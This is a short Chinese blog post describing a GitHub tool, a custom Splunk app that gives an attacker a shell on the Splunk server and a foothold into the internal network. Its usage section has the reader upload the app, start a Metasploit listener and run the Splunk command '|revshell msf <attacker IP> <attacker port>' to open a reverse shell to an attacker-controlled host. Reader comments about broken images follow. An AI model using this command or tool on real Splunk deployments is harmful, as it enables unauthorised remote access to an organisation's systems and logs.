通过splunk自定义app获取shell


       Splunk是一个日志、流量聚合分析工具,通常用于防御分析和基础设施管理。正日Github作者说的,虽然这些工具可以很好地发现安全事件及风险,但它们也会反过来被攻击者利用,攻陷splunk并渗透内网中,成为管理员的噩梦。


使用方法:



上传APP后,本地使用MSF监听,并在splunk中执行以下语句即可获取shell


|revshell msf <attacker IP> <attacker port>





GitHub传送门

本博客所有文章如无特别注明均为原创。作者:R3m1x ,复制或转载请注明转自原文地址《通过splunk自定义app获取shell
分享到:更多

相关推荐

发表评论

路人甲 表情
Ctrl+Enter快速提交

网友评论(2)

贵站的图片好像挂了
知识共享网 11个月前 (2019-05-03) 回复
@知识共享网:多谢提醒
R3m1x 11个月前 (2019-05-20) 回复